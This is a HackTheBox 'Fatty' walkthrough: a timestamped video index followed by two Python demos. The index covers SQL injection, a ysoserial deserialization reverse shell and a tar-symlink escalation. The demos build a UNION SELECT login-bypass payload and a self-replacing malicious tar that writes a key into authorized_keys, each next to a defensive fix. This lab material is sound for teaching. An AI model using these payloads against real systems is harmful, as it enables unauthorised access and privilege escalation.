HackTheBox Fatty
http://youtube.com/watch?v=3bvKLj0akMM
00:00 - Intro
02:10 - Using wget to recursively download files off an anonymous FTP server
06:00 - Attempting to execute the Java thick client, then switching to Java version 8 and trying again
08:00 - Seeing that the thick client makes some DNS requests, making the DNS name resolve and attempting to intercept with Burp
11:00 - BurpSuite failed us; using socat to forward the traffic and exploring the thick client features
15:20 - Using CFR to decompile a Java JAR file, then Visual Studio Code to analyze the source
20:40 - Downloading Eclipse, configuring it to use Java 8 and creating a Hello World Java application
25:30 - Importing a Java JAR file into our Java project, then calling Login
33:40 - Replicating the functionality to identify what role we are, then other functions
37:45 - Calling the Invoker class to execute methods on the server
42:50 - Attempting to call methods that the GUI prohibited us from calling
45:30 - Using ShowFiles to see we can list files in our parent directory, then using Open to download files
53:40 - Failing to download the fatty-server.jar file due to encoding issues
58:40 - Unsealing the JAR file so we can edit the Invoker class object to fix our encoding issue by creating a binaryOpen function
1:10:00 - Utilizing our new binaryOpen function to write to a file
1:14:45 - Debugging a null pointer error: our binaryOpen function returned nothing!
1:21:00 - Decompiling the downloaded fatty-server.jar and analyzing it to discover a SQL injection and a deserialization vector
1:28:50 - Playing with SQL injection in the username to get an admin session
1:40:00 - Modifying the ChangePW function to allow us to send malicious payloads, then using ysoserial to generate a payload
1:48:30 - Using CommonsCollections5 to generate a malicious payload, sending it and getting a reverse shell
1:57:17 - Getting pspy on the box and discovering that scp is pulling files
1:59:50 - Explaining our exploit path: a tar archive that overwrites itself with a symlink pointing to authorized_keys, so the next time the file is copied over, the write lands in authorized_keys
2:04:50 - Reverse shell returned, attempting to explain the exploit vector again
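The 1:28:50 step uses an injection in the username field to obtain an admin session. The box's real query, schema and hashing are not on this page, so what follows is an added, hypothetical Python/SQLite reconstruction of the pattern that makes such an attack work (the username concatenated into the lookup query, the password hash checked afterwards in application code) next to the parameterised version that closes it. It is not the video's or the box's code; the accounts, hashes and the `union_payload` helper are constructed for the demo.

```python
import hashlib
import sqlite3

# Constructed demo accounts; not the box's real users, hashes or roles.
DEMO_USERS = [
    (1, "admin", hashlib.sha256(b"S3cretAdminPw!").hexdigest(), "admin"),
    (2, "alice", hashlib.sha256(b"password123").hexdigest(), "user"),
]


def build_db():
    """In-memory SQLite table standing in for the server's user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", DEMO_USERS)
    return db


def vulnerable_login(db, username, password):
    """Hypothetical vulnerable pattern: the username is concatenated into the
    query, and the password hash from whatever row comes back is compared in code."""
    sql = f"SELECT username, password, role FROM users WHERE username = '{username}'"
    row = db.execute(sql).fetchone()
    if row is None:
        return None
    name, stored_hash, role = row
    if stored_hash != hashlib.sha256(password.encode()).hexdigest():
        return None
    return {"username": name, "role": role}


def safe_login(db, username, password):
    """Same logic with a bound parameter: the payload is just an unknown username."""
    sql = "SELECT username, password, role FROM users WHERE username = ?"
    row = db.execute(sql, (username,)).fetchone()
    if row is None:
        return None
    name, stored_hash, role = row
    if stored_hash != hashlib.sha256(password.encode()).hexdigest():
        return None
    return {"username": name, "role": role}


def union_payload(wanted_name, attacker_password):
    """Username that makes the vulnerable query return a row we control.

    A plain `admin'-- ` only returns the real admin row, whose hash we cannot
    satisfy, so the login still fails. UNION SELECT instead appends a row that
    carries a hash we DO know and the role we want; the server's own password
    check then passes and hands us an admin session."""
    h = hashlib.sha256(attacker_password.encode()).hexdigest()
    # The query's closing quote completes the last literal: ... 'admin'
    return f"x' UNION SELECT '{wanted_name}', '{h}', 'admin"


if __name__ == "__main__":
    db = build_db()
    print("comment-only payload:", vulnerable_login(db, "admin'-- ", "guess"))
    print("union payload (vulnerable):", vulnerable_login(db, union_payload("admin", "attacker"), "attacker"))
    print("union payload (parameterised):", safe_login(db, union_payload("admin", "attacker"), "attacker"))
```

The point worth noticing is why a comment-based payload is not enough here: when the password check happens in code rather than in SQL, you need the query to return a row whose hash you chose, which is exactly what the UNION row provides.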
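The exploit path explained at 1:59:50 and 2:04:50 (a pulled tar archive that replaces itself with a symlink to authorized_keys, so the next copy writes through the link) as an added, self-contained simulation, not code from the video. The real cron command, remote paths and key are not on this page; here a temp directory stands in for both hosts, plain file writes stand in for the scp pull, and `naive_extract` stands in for an unfiltered `tar xf`. `archive_is_safe` is the check the privileged side should have run before extracting.

```python
import io
import os
import tarfile
import tempfile

# Constructed placeholder, not a real key.
ATTACKER_KEY = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialNotReal attacker@example\n"


def build_malicious_tar(archive_name, link_target):
    """Tar whose only member is a symlink carrying the archive's own filename.
    Extracting it in the directory that holds the archive replaces the archive
    with a symlink to link_target (for example a root authorized_keys path)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=archive_name)
        info.type = tarfile.SYMTYPE
        info.linkname = link_target
        tar.addfile(info)
    return buf.getvalue()


def build_benign_tar():
    """A normal archive with one regular file, used to exercise the defensive check."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"2020-01-01 12:00:00 service started\n"  # constructed log line
        info = tarfile.TarInfo(name="app.log")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def naive_extract(archive_path, dest):
    """Stand-in for an unfiltered `tar xf`: link members are created as-is."""
    with tarfile.open(archive_path) as tar:
        try:
            # Python 3.12+ defaults towards the 'data' filter, which refuses this link;
            # ask for the trusting behaviour explicitly to mirror plain GNU tar.
            tar.extractall(dest, filter="fully_trusted")
        except TypeError:  # older Python without the filter argument
            tar.extractall(dest)


def archive_is_safe(data):
    """What the privileged side should check before extracting: refuse archives
    containing hard/symbolic links or member names that escape the destination."""
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk():
                return False
            name = os.path.normpath(m.name)
            if os.path.isabs(name) or name == ".." or name.startswith(".." + os.sep):
                return False
    return True


def run_scenario():
    """Play both rounds of the pull-and-extract loop inside a temp directory.
    Returns (archive_became_symlink, final_authorized_keys_contents)."""
    with tempfile.TemporaryDirectory() as root:
        # Privileged side: an authorized_keys file and the directory the archive lands in.
        ssh_dir = os.path.join(root, "root_ssh")
        os.makedirs(ssh_dir)
        auth_keys = os.path.join(ssh_dir, "authorized_keys")
        with open(auth_keys, "wb") as f:
            f.write(b"# original keys\n")
        workdir = os.path.join(root, "pulled")
        os.makedirs(workdir)
        archive_path = os.path.join(workdir, "logs.tar")

        # Round 1: the pull copies our crafted archive, then it is extracted in place,
        # which swaps logs.tar for a symlink to authorized_keys.
        with open(archive_path, "wb") as f:
            f.write(build_malicious_tar("logs.tar", auth_keys))
        naive_extract(archive_path, workdir)
        became_link = os.path.islink(archive_path)

        # Round 2: on our side the file now holds our public key; the next pull writes
        # to logs.tar, which is a symlink, so the bytes land in authorized_keys.
        with open(archive_path, "wb") as f:
            f.write(ATTACKER_KEY)
        with open(auth_keys, "rb") as f:
            return became_link, f.read()


if __name__ == "__main__":
    link, keys = run_scenario()
    print("archive became symlink:", link)
    print("authorized_keys now:", keys.decode().strip())
    print("malicious archive passes check:", archive_is_safe(build_malicious_tar("logs.tar", "/x")))
```

The extract step is the dangerous one, not the copy: a copy into a fixed destination name is harmless until something has turned that name into a link. Rejecting link members (or extracting into a fresh empty directory each run) breaks the loop.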